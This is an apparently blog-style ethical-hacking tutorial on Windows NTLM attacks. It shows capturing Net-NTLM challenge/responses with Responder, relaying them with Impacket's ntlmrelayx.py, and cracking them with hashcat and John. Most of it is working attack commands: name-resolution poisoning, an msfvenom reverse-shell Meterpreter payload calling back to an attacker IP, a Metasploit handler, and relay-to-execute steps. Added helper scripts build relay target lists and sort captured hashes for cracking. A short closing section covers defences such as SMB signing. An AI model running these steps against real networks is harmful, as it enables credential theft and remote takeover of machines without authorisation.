
SMB is a common attack surface on Windows networks, so it makes sense that Kali Linux ships with SMB exploitation tools preinstalled. Others have to be installed separately and are usually found on GitHub. One such tool is Responder. Another comes from the Impacket bundle (originally from Core Security, now maintained by Fortra), a collection of network protocol and exploitation scripts written in Python. The one we will be using is ntlmrelayx.py, which performs NTLM relay attacks.

I show you how to do SMB Relay attacks and how to use Responder in a realistic lab environment in Become An Ethical Hacker, check the price on Amazon.


In this tutorial I first put Responder in analyze (listen-only) mode, then use its poisoning features to capture NTLM authentication attempts on the network. What Responder captures is the Net-NTLM challenge/response, not a cleartext password and not the NT hash itself; it has to be cracked offline or relayed. I also cover ntlmrelayx.py (the successor to Impacket's older smbrelayx.py), which relays the intercepted authentication to another host and can run a payload there automatically.

Here’s What You Need

  • Kali Linux Virtual Machine (VirtualBox), which already includes Responder
  • Windows Virtual Machine (VirtualBox)
  • Impacket from GitHub

Windows NTLM Hashes

Some terminology first: NTLM hash, Net-NTLM hash, NTLMv1 and NTLMv2. The thing to know is that "NTLM hash" means the NT hash stored on the system, while "Net-NTLM" (Net-NTLMv1 or Net-NTLMv2) is the challenge/response that crosses the wire during authentication and is computed from that NT hash.

NTLM Hashes

These are stored on the Domain Controller in the NTDS.dit file and locally in the SAM (Security Account Manager) database. Two ways to obtain them:

  • ntlmrelayx.py dumps the local SAM by default after successfully relaying an authentication to a target (this requires the relayed account to be a local administrator there).
  • crackmapexec with the --ntds option dumps NTDS.dit from a Domain Controller (over DRSUAPI by default, or from a volume shadow copy with --ntds vss) and parses out the NTLM hashes.

Net-NTLM Hashes

Net-NTLM hashes are used in Windows network authentication and are derived from the user's NT hash combined with a server challenge. They can NOT be used to pass the hash; only the NTLM (NT) hash can. They can, however, be cracked offline or relayed. The trailing part of a Net-NTLMv2 response (NTProofStr followed by the blob) looks like this; the full line Responder writes is user::DOMAIN:challenge:NTProofStr:blob.

9C32802781F07AF2FA67D50AAA9F7435:0101000000000000ECEFA524BF3DD5019548408BB87FAD2F000000000200060053004D004200010016

NTLM Relay Attack

Windows machines constantly reach out over the network and will happily authenticate to whatever answers them, for example when resolving a mistyped share name, looking up WPAD, or mounting a share. Knowing this behaviour is commonplace, what can be done with it? If you can get a host to send its authentication to you, you can either capture the challenge/response and crack it, or relay it, in real time, to another host that accepts the same credentials.

Impacket

ntlmrelayx.py

Impacket's ntlmrelayx can be set up to receive connections, relay them to a target, and execute a payload there automatically. This is especially useful in combination with a C2 framework such as the PowerShell exploitation framework Empire or Metasploit.

Before running the script, turn off Responder's SMB server (and its HTTP server, if you also want to relay HTTP authentication) by editing /etc/responder/Responder.conf, because both tools cannot bind the same ports. Then give ntlmrelayx.py the targets it should relay to: a single target with -t, or a file of targets with -tf.

$ echo '10.0.2.9' > remote-hosts.txt
$ ntlmrelayx.py -tf remote-hosts.txt
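Added example (shell, not from the original post): a small script that flips the SMB and HTTP entries of Responder.conf to Off and verifies the result before ntlmrelayx.py is started. It assumes the Kali path /etc/responder/Responder.conf and the "Name = On" key layout of the [Responder Core] section; the config embedded in make_sample_conf is a constructed stand-in so the functions can be exercised offline.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post. Switches Responder's SMB and
# HTTP servers Off so ntlmrelayx.py can bind ports 445 and 80, then checks it.
# Path and key layout are assumptions based on the Kali package.
set -eu

# Set each named server in the [Responder Core] section to Off (idempotent;
# keys that are already Off are left alone).
disable_responder_servers() {
  local conf="$1"; shift
  local svc
  for svc in "$@"; do
    sed -i -E "s/^(${svc}[[:space:]]*=[[:space:]]*)On[[:space:]]*$/\1Off/" "$conf"
  done
}

# Print the current state of one server as "NAME=On" or "NAME=Off".
server_state() {
  local conf="$1" svc="$2"
  awk -v s="$svc" -F'=' '$1 ~ "^" s "[[:space:]]*$" {
    gsub(/[[:space:]]/, "", $2); print s "=" $2; exit
  }' "$conf"
}

# Constructed sample config (the real file has many more keys); prints its path.
make_sample_conf() {
  local f; f="$(mktemp)"
  cat > "$f" <<'EOF'
[Responder Core]
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
EOF
  echo "$f"
}

# Usage: sudo ./relay-prep.sh /etc/responder/Responder.conf
# With no argument nothing is changed, so the functions can be sourced safely.
if [ "${1:-}" ]; then
  disable_responder_servers "$1" SMB HTTP
  server_state "$1" SMB
  server_state "$1" HTTP
fi
```

The regex is anchored on the key name followed by optional whitespace and "=", so HTTP does not accidentally match HTTPS and SMB does not match SMTP; check the output of server_state for both keys before starting ntlmrelayx.py, which will otherwise fail to bind.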

SMB Relay Attack to Get a Shell

These are the steps for using ntlmrelayx.py to automatically serve a payload to a host that connects to it.

  1. Generate an msfvenom payload.
  2. Start a multi/handler in msfconsole (or a netcat listener for unstaged payloads).
  3. Run ntlmrelayx.py -t <target-IP> -smb2support -e ./payload.exe (use -tf <file> instead of -t for a list of targets).
  4. On the victim machine run net use \\fake\share, where "fake" is a name that does not exist in DNS so the lookup falls through to LLMNR/NBT-NS and Responder answers it (or use your attacker IP directly); this triggers an authentication that ntlmrelayx.py receives and relays to the target.

SMB relaying is not that difficult to pull off; the concept is often easier to grasp than its execution. Remember these constraints though: the account being relayed must be a local administrator on the target for the payload to run, the target must not require SMB signing, and an authentication cannot be relayed back to the host it came from, so the victim and the target must be different machines.

# 1. Responder poisons name lookups on eth0; -v prints every captured hash, -r answers NetBIOS wredir suffix queries
sudo responder -I eth0 -rv

# 2. Build the payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.197 LPORT=1234 -f exe -o test.exe

# 3. Start the handler inside msfconsole (must match the payload, LHOST and LPORT above)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.197
set LPORT 1234
run -j

# 4. Relay incoming SMB authentication to the target and execute the payload there
python3 ntlmrelayx.py -t 10.0.0.33 -smb2support -e test.exe

Impacket's ntlmrelayx.py is the piece that facilitates the attack. With it running and the payload set, the next authentication that reaches it is relayed to the target and, if the relayed account is a local administrator there, the payload is executed and your handler receives the session.

Make a Windows Net Request

To kick off a network authentication request, use net view or net use, or simply navigate in File Explorer to a network share. The share can be fake (a name that does not exist in DNS, so the lookup falls through to LLMNR/NBT-NS and Responder answers it) or a real share, for example one hosted with Impacket's smbserver.py (on a host other than the one running ntlmrelayx.py, which needs port 445 itself).


Capture Net-NTLM Hash with Responder

Responder Analyze Mode

Responder has an analyze mode (-A) in which it only listens and does not poison anything; use it to observe what normal name-resolution and authentication traffic looks like on the segment before attacking.


Immediately, requests for the WPAD file pour in to Responder's listening interface. WPAD (Web Proxy Auto-Discovery) is how Windows clients look up a proxy configuration file (wpad.dat) over the network; the name lookup for "wpad" is exactly the kind of request Responder can poison, and the HTTP fetch that follows can be made to authenticate.


To configure which servers Responder actively runs, edit its configuration file (/etc/responder/Responder.conf). Simply set the features you do not want to Off.


Responder Capture Mode


Now capture Net-NTLM hashes by starting Responder in its default poisoning mode (without -A).


Sometimes Responder prints "skipping previously captured hash for {user}" and does not show the newly captured hash because it is for the same user, which is irritating.

To fix that, restart Responder with the -v (verbose) flag; it will then print the hash every time. The captures are also written to files under Responder's logs directory, one file per protocol and source host.

Crack the Hash with Hashcat

# -m 5600 is NetNTLMv2 (Responder's SMB-NTLMv2-SSP-* files); use -m 5500 for NetNTLMv1 captures
hashcat -m 5600 hashes\net-ntlm-hashes.txt known-password.txt -o cracked-passwords.txt
hashcat (v5.1.0) starting...
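Added example (shell, not from the original post): before handing captures to hashcat it helps to sort Responder's lines into the right mode and keep one capture per user, since Responder logs a fresh challenge/response for every authentication and every line of the same user costs cracking time for no gain. The script classifies a line by the field lengths of the Net-NTLMv1 and Net-NTLMv2 formats (a 48-hex LM response versus a 16-hex server challenge in the fourth field) and writes per-mode files. The capture lines in make_sample_captures are constructed (made-up hex of the correct lengths), and the Responder logs path in the usage comment is the Kali default, assumed.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: sort Responder's captured
# challenge/responses into the right hashcat mode and drop duplicate users
# before cracking. Sample lines below are constructed, not real captures.
set -eu

# Print the hashcat mode for one Responder capture line:
#   NetNTLMv2  user::DOMAIN:challenge(16 hex):NTProofStr(32 hex):blob  -> 5600
#   NetNTLMv1  user::DOMAIN:LMresp(48 hex):NTresp(48 hex):challenge    -> 5500
ntlm_mode() {
  printf '%s\n' "$1" | awk -F':' '
    NF == 6 && length($4) == 16 && length($5) == 32 { print 5600; exit }
    NF == 6 && length($4) == 48 && length($5) == 48 { print 5500; exit }
    { print "unknown" }'
}

# Read capture lines from $1, keep the first capture per user@domain (one is
# enough to crack) and write them to $2/netntlm-<mode>.txt, so each file can go
# straight to hashcat with that mode. Unrecognised lines land in netntlm-unknown.txt.
split_by_mode() {
  local in="$1" out="$2" line key mode
  : > "$out/seen"
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    key="$(printf '%s\n' "$line" | awk -F':' '{ print tolower($1 "@" $3) }')"
    if grep -qxF "$key" "$out/seen"; then continue; fi
    echo "$key" >> "$out/seen"
    mode="$(ntlm_mode "$line")"
    echo "$line" >> "$out/netntlm-$mode.txt"
  done < "$in"
}

# Constructed sample: two NetNTLMv2 captures for the same user (different
# challenges, so the second is a duplicate for cracking purposes) and one
# NetNTLMv1 capture. Hex values are made up but have the correct lengths.
make_sample_captures() {
  cat <<'EOF'
jdoe::LAB:1122334455667788:5d3a9f0c2b7e4a1f8c6d0e2b4a6c8e0f:0101000000000000c0653150de09d2011122334455667788000000000200080053004d00420000000000
jdoe::LAB:8877665544332211:7c1e0b9a3f5d2e4c6a8b0d1f3e5c7a9b:0101000000000000c0653150de09d2018877665544332211000000000200080053004d00420000000000
asmith::LAB:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4ea35fa55d1ff2c0ccd4ba7e3d0a83c6b2f0d1e4a592:1122334455667788
EOF
}

# Usage (Kali path assumed):
#   cat /usr/share/responder/logs/SMB-NTLM*-SSP-*.txt > captures.txt
#   ./sort-captures.sh captures.txt out
#   hashcat -m 5600 out/netntlm-5600.txt wordlist.txt
#   hashcat -m 5500 out/netntlm-5500.txt wordlist.txt
if [ "${1:-}" ]; then
  mkdir -p "${2:-out}"
  split_by_mode "$1" "${2:-out}"
  ls "${2:-out}"
fi
```

Deduplicating by user rather than by full line matters because the server challenge differs on every capture, so no two Responder lines for the same user are ever byte-identical; the NetNTLMv1 file is also the one worth prioritising, since v1 responses are DES-based and fall far faster than v2.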

Crack the Hash with John

John is able to crack the Net-NTLM password within seconds.


Use Metasploit’s SMB Server

auxiliary/server/capture/smb

Using Metasploit's auxiliary SMB capture module you can receive Net-NTLM responses from connecting hosts. The module prints the LMHASH and NTHASH fields, which are the challenge responses rather than the stored NT hash, and can write them in John format with its JOHNPWFILE option. It answers with a fixed server challenge (the CHALLENGE option, 1122334455667788 by default), which is what makes NTLMv1 responses attackable with precomputed tables.

To stop the SMB server afterwards, find its job ID with jobs and use kill <job-id>, for example "kill 0".

NTHASH is revealed! This is the Net-NTLM response, not the NT hash itself; crack it with John or Hashcat.

Crack the Net-NTLM Hash with John

In this scenario I know the password and have put it in the password list I am using. John is capable of cracking a Net-NTLM hash, notice below how it cracked the hash from the Windows client.


Blue Team: Defend the Castle

To defend against this type of attack, security teams use Group Policy Objects to disable LLMNR and NetBIOS over TCP/IP, removing the name-resolution fallbacks that Responder poisons. Also require SMB signing: by default Windows only requires it on domain controllers; on workstations and member servers it is supported but not required, which is exactly the state that allows relaying. Disabling LLMNR and NetBIOS alone is not enough, because other poisoning paths (WPAD via DHCP or DNS, mDNS, IPv6 DNS takeover) still exist; requiring signing is what actually breaks the relay.

  • Use Group Policy (or the registry via PowerShell on standalone hosts) to disable LLMNR (Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution) and NetBIOS over TCP/IP on every network adapter.
  • Require SMB signing on all hosts, not just domain controllers, via the policy "Microsoft network server: Digitally sign communications (always)".
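Added example (shell, not from the original post), serving both the relay prerequisite from the shell section above (the target must not require SMB signing) and the signing defence just listed: a script that turns nmap's smb2-security-mode output into a per-host verdict, so the attacker gets a valid target file for ntlmrelayx.py -tf and the defender gets the list of hosts that still need the signing policy. The nmap invocation and the exact wording of the script's "Message signing ..." lines are assumptions about nmap's output; the scan embedded in make_sample_scan is constructed so the script runs offline.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post. Turns `nmap -p445 --script
# smb2-security-mode` normal output into a relay target list (attacker) or a
# remediation list (defender). Host names and IPs below are constructed.
set -eu

# Emit "<host> <relayable|protected|unknown>" for every host in the scan.
# A host is relayable when signing is disabled or enabled but not required.
parse_smb_signing() {
  awk '
    /^Nmap scan report for/ {
      if (host != "") print host, state
      host = $NF; gsub(/[()]/, "", host)   # "name (ip)" -> keep the ip
      state = "unknown"
    }
    /Message signing/ {
      line = tolower($0)
      if (line ~ /not required/ || line ~ /disabled/) state = "relayable"
      else if (line ~ /required/) state = "protected"
    }
    END { if (host != "") print host, state }
  ' "$@"
}

# Only the hosts ntlmrelayx.py can actually relay to (feed this to -tf).
relay_targets() {
  parse_smb_signing "$@" | awk '$2 == "relayable" { print $1 }'
}

# Constructed sample scan of three hosts in nmap's normal-output layout
# (the script output strings are assumed). Prints the temp file path.
make_sample_scan() {
  local f; f="$(mktemp)"
  cat > "$f" <<'EOF'
Nmap scan report for 10.0.0.33
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.lab.local (10.0.0.10)
Host is up (0.00040s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.51
Host is up (0.00070s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing disabled
EOF
  echo "$f"
}

# Usage: nmap -p445 --script smb2-security-mode -oN scan.txt 10.0.0.0/24
#        ./relay-audit.sh scan.txt   -> writes remote-hosts.txt, prints the verdict table
if [ "${1:-}" ]; then
  relay_targets "$1" > remote-hosts.txt
  parse_smb_signing "$1"
fi
```

Run it before relaying to avoid wasting a captured authentication on a host that will reject it, and run it again after rolling out the signing policy: the blue-team goal is an empty remote-hosts.txt, with every host reported as protected.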